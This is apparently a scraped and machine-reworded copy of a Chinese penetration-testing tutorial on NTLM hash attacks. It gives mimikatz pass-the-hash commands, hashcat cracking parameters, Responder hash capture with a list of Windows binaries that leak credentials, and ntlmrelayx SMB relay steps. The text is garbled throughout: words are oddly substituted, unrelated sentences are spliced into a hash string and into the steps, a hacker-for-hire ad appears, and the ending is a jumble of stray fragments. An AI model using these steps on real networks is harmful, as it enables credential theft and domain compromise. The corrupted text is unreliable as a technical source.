本文从hash获取 *** ，爆炸hash，hash中转，中继等方面全面剖析，以直观详细的实践来了解进犯进程，进程比较详细，请耐性观看。

 

0x02 什么是NTLM-hash、net NTLM-hash

NTLM hash是windows登录暗码的一种hash，可从Windows系统中的SAM文件和域控的NTDS.dit文件中取得全部用户的hash（比方用Mimikatz提取），获取该hash之后，可进行爆炸明文、哈希传递（PtH进犯），

Net-NTLM的hash是根据NTLM的hash值经过必定的算法发作的，获取Net-NTLM的hash之后，可进行爆炸明文、运用 *** b进行中继进犯，该hash不能进行哈希传递进犯。
什么是NTLM hash？

NTLM hash的生成 *** ：

1、将明文口令转换成十六进制的格局

2、把十六进制转换成Unicode格局，每个字节之后增加0x00

3、再对Unicode字符串作MD4加密，生成32位的十六进制数字串

这儿我经过mimikat *** 西先直观的了解NTLM hash，mimikatz直接从 lsass.exe 里获取windows处于active状况账号明文暗码，以windows server2012为例：

从上图发现：

NTLM hash：A1E33A2281B8C6DBC2373BFF87E8CB6E

明文暗码：123456Abc

 

0x03 对NTLM hash暴力破解

假如经过其它途径取得此hash，即A1E33A2281B8C6DBC2373BFF87E8CB6E，可用hashcat进行字典暴力破解，Hashcat参数如下：

hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

参数阐明：
-m 挑选哈希类别，1000为NTLM
-o 输出破解成功的明文
example.dict 明文字典

翻开out.txt，发现明文123456Abc

留意：

因为windows server2012 r2、windwos 8.1以及更高版别都做了加固，即制止明文缓存到内存，而mimikatz是根据内存获取明文暗码，则无法直接经过mimikatz获取明文暗码，直接提取成果为“null”，但可经过修正注册表来获取。

参看

受维护用户 ( Protected Users )

http://www.bubuko.com/infodetail-2077149.html

 

0x04 NTLM哈希传递

哈希传递浅显来讲，便是不需求明文登录，用NTLM hash可直接进行登录。

在我们运用某服务时，Windows会带上本身的认证信息进行检验登录，这个认证信息其实便是Net-NTLM的Hash，我们运用哪些服务会让Windows带上本身认证信息登录？如访问 *** b同享文件夹等，此刻会运用认证信息检验登录，而且调用lsass内存中的hash缓存检验登录，此刻运用mimikatz等东西修正缓存的hash为获取得到的hash，然后运用修正的hash进行登录，这是哈希传递的原理。文章后边讲到的获取Net-NTLM的hash，其实便是运用带认证信息访问 *** b，如让处理员访问此wdb：<img src="192.168.191.129xx">，192.168.191.129被进犯者操控的一台内网PC，可获取处理员的Net-NTLM hash。

先讲下认证恳求进程：

1、客户端先对在本地对暗码加密成为暗码散列
2、客户端发送认证恳求，即发作明文账号
3、服务器回来一个16位的随机数字发送给客户端，作为一个 challenge
4、客户端再用进程1的暗码散列来加密这个 challenge ，作为 response回来给服务器。
5、服务器把用户名、给客户端的challenge 、客户端回来的 response ，发送域操控器
6、域操控器运用此用户名在SAM暗码处理库的暗码散列，加密给客户端的challenge
7、与进程4客户端加密的challenge比较，假如两个challenge共同，认证成功

哈希传递缝隙发作在进程4中，直接运用修正缓存后的hash，进行challenge加密，对challenge 加密的hash现已不是发送账号对应的hash，而是进犯者经过其他途径获取的hash进行challenge加密。
Pth进犯演示：

靶机ip：

进犯机ip：

假定现已取得NTLM hash：

处理员身份运转mimikatz：

mimikatz履行指令参数：

sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E33A2281B8C6DBC2373BFF87E8CB6E

此刻再进行其它认证操作，可直接用获取的方针hash进行登录认证。

 

0x05 Net-NTLM hash获取

Net-NTLM hash不能直接获取，经过Responder东西进行阻拦获取，此hash不能进行哈希传递，但可进行中继转发，运用Responder等中间人东西，结合其它东西可自动化进行阻拦获取并中继转发，其它东西如 Impacket的ntlmrelayx.py进行中继转发。

在进犯机上运转Responder，此刻进犯机模仿为 *** B服务让受害者进行认证登录，经过设置几个模仿的歹意看护进程（如SQL服务器，FTP，HTTP和 *** B服务器等）来直接提示凭证或模仿质询 – 呼应验证进程并捕获客户端发送的必要 hash，当受害者机器检验登陆进犯者机器，responder就能够获取受害者机器用户的NTLMv2哈希值。。

Responder下载安装：

https://github.com/lgandx/Responder

Responder操作演示

客户端IP：

进犯机IP：

1、 无需修正Responder.conf，因为此刻 *** B、HTTP服务不要封闭，等中继进犯时才封闭这两个服务。因而这儿先演示Responder怎样获取net-NTLM hash，在中继进犯里封闭 *** B、HTTP，是因为此刻不再由Responder获取hash，而是直接让ntlmrelayx.py来结束这一使命。

2、 进犯机履行 python Responder.py -I eth0，此刻处于监听状况

3、 运用 *** B协议，客户端在联接服务端时，默许先运用本机的用户名和暗码hash检验登录，所以能够模仿 *** B服务器然后截获hash，履行如下指令都能够得到hash。
客户端履行如下指令，进犯机的Responder能收到。

> net.exe use hostshare > attrib.exe hostshare  > bcdboot.exe hostshare  > bdeunlock.exe hostshare  > cacls.exe hostshare  > certreq.exe hostshare #(noisy, pops an error dialog) > certutil.exe hostshare  > cipher.exe hostshare  > ClipUp.exe -l hostshare  > cmdl32.exe hostshare  > cmstp.exe /s hostshare  > colorcpl.exe hostshare #(noisy, pops an error dialog)  > comp.exe /N=0 hostshare hostshare  > compact.exe hostshare  > control.exe hostshare  > convertvhd.exe -source hostshare -destination hostshare  > Defrag.exe hostshare  > diskperf.exe hostshare  > dispdiag.exe -out hostshare  > doskey.exe /MACROFILE=hostshare  > esentutl.exe /k hostshare  > expand.exe hostshare  > extrac32.exe hostshare  > FileHistory.exe hostshare #(noisy, pops a gui)  > findstr.exe * hostshare  > fontview.exe hostshare #(noisy, pops an error dialog)  > fvenotify.exe hostshare #(noisy, pops an access denied error)  > FXSCOVER.exe hostshare #(noisy, pops GUI)  > hwrcomp.e建议配备xe -check hostshare  > hwrreg.exe hostshare  > icacls.exe hostshare   > licensingdiag.exe -cab hostshare  > lodctr.exe hostshare  > lpksetup.exe /p hostshare /s  > makecab.exe hostshare  > msiexec.exe /update hostshare /quiet  > msinfo32.exe hostshare #(noisy, pops a "cannot open" dialog)  > mspaint.exe hostshare #(noisy, invalid path to png error)  > msra.exe /openfile hostshare #(noisy, error)  > mstsc.exe hostshare #(noisy, error)  > netcfg.exe -l hostshare -c p -i foo  

客户端履行 net use 192.168.191.131aaa

4、 进犯机成功收到NTLMv2-SSP Hash

Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000

爆炸net-NT

LM hash

持续用hashcat进行hash爆炸，Hashcat参数如下：

hashcat64.exe -m 5600 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0上面这段PowerShell代码段运用了WMI来枚举全部的EXE和DLL。之所以挑选这种 *** ，而不挑选Get-ChildItem，是因为它在检验访问其无权访问的文件时，有或许引发失常。653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 example.dict -o out.txt --force

参数阐明：

-m 挑选哈希类别，5600为net-NTLM

成功破解出明文暗码，如下图：

翻开out.txt，发现破解出明文123456Abc

 

0x06 *** B中继进犯

前面文章说过了，当获取到net-NTLM hash之后，因为不能经过相似哈希传递的修正缓存hash进行认证，此hash无法进行哈希传递，怎样进行进犯呢？可经过Responder东西阻拦处理员的net-NTLM hash，合作ntlmrelayx.py进行中继转发。

Impacket下载：

git clone https://github.com/CoreSecurity/impacket.git

进行中继条件：方针 *** B签名需求封闭，在 *** B联接中，需求运用安全机制来维护服务器和客户端之间传输数据的完整性，而这种安全机制便是 *** B签名和加密，假如封闭 *** B签名，会答应进犯者阻拦认证进程，而且将取得hash在其他机器上进行重放,，然后取得域管权限。

现在 *** B常用来做为 *** B文件同享、打印机，假如签名封闭，或许导致文件同享、打印机被侵略。

比方我用虚拟机建立的 *** B文件同享如下，详细认证登录进程文章前面部分已讲过，看看这个作用：

虚拟机IP：192.168.191.139

先勘探方针是否已封闭 *** B签名，指令如下：

nmap --script *** b-security-mode.nse -p445 192.168.191.139 --open

如下是我用虚拟机建立的域控环境测验，中继转发操作：

域内普通用户-受害者机器（win7）

域处理员(administrator)机器（windows server 2012 r2）

kali linux 进犯者机器

1、Responder封闭 *** B、HTTP

1.进入的带外ICMP差错消息将匹配规则；

[1][2][3][4][5]黑客接单网

2、履行python Responder.py -I eth0 -r -d –w

3、履行python ntlmrelayx.py -tf targets.txt -socks - *** b2support

阐明 ：

targets.txt内容为域内受害IP 192.168.191.139

python ntlmrelayx.py -t 192.168.191.139 -socks - *** b2support //

4、域管模仿输入一个同享，生成一个LLMNR恳求

5、经过Responder发送

6、NTLMv2哈希凭证被中继

进犯流程总结：

1、封闭Responder的 *** B和HTTP服务, 运转Responder东西来截取Net-NTLM哈希值

2、运转ntlmrelayx.

------b)security adminstrators 可处理服务器的登录。

py脚本，将Net-NTLM哈希值发送到ntlmrelayx.py脚本的 *** B和HTTP服务

3、ntlmrelayx.py将hash发送到方针列表中，假如中继操作履行成功会触发告诉指令。

这儿先大约了解下中继转发的原理基础，鄙人一篇会结合DeathStar和Empire，演示自动化域浸透，以及对net NTLM-hash的运用。

本文由安全客原创发布 
转载，请参看转载声明，注明出处： https://www.anquanke.com/post/id/177123 
安全客 - 有思维的安全新媒体

 

课程参谋:内网浸透——针对hash的进犯

获取项目源码：运用Elcomsoft系统恢复东西 *** 一个可发起的Windows PE闪存2.Kerberoasting可是只需一条指令即可“Net Use /Delete %computername%”内网渗透——针对hash的攻击

课程顾问那么我们该怎样进行app缝隙的开掘呢？首要，关于从web安全转战移动端缝隙开掘的安全工作者而言，当然想挖一挖和自己地址领域比较邻近的缝隙，而app的服务端底子和web安全领域的服务端差不多，只是web程序它的客户端更多的是浏览器，而移动运用它一般都有一个能够设备在移动设备上的app程序。所以，关于app服务端缝隙的开掘上面，我们照样能够仰仗以往的web阅历，对其间的一些xss，ssrf，sql注入，任意文件读取等缝隙进行开掘。只是只是带手机在外面逛了一圈，还来不及发挥任何操作，信息就现已暴露了。信赖我们心里免不了有一丝严重，也必定猎奇，这个小小的“智能盒子”究竟是怎样结束他的这些功用的？我们一同来看看。1、NTFS文件系统中的时间特色参看来历：https://firewalld.org/documentation/

然后运用gcc编译demo.c文件，并进步编译文件的SUID权限。SetSPN进一步的谷歌搜索之后，我在StackOverFlow上找到了替代 *** ，Android 4.4（katkat）能够将蓝牙数据包记载在一个文件中，我深化了解了一下，发现需求启用开发者方式，联接蓝牙设备然后交互，全部记载将会被记载到SD卡中的“btsnoop_hci”文件中。用如下指令编译课程顾问

我们先来看看，运用程序中的类都有哪些。

--- 000 0内网渗透——针对hash的攻击

课程顾问NTSTATUS TriggerPoolOverflow(IN PVOID UserBuffer， IN SIZE_T Size) {在这一部分中，我们选取了10款有代表性的勒索软件，下面我们将逐个研讨它们用到的加密 *** 。关于智能锁安全，用户需求了解的两个不安全概念？ -M, --make *** 咖啡

mkdir("./upload");# 不答应空暗码课程顾问

try {美国国土安全部，对加利福尼亚州一个涉嫌儿童色情的案件的查询；内网渗透——针对hash的攻击

设备虚拟机客户东西的 *** 并没有很大改动，在最新的Vmware（Workstation和Fusion）以及VirtualBox中都能够正常作业。import netaddr

黑客首要先运用一个“at”指令传达一个后门程序

0x01 无缺的运用链PS C:> Get-ServiceFilePermission
本文标题:课程参谋:内网浸透——针对hash的进犯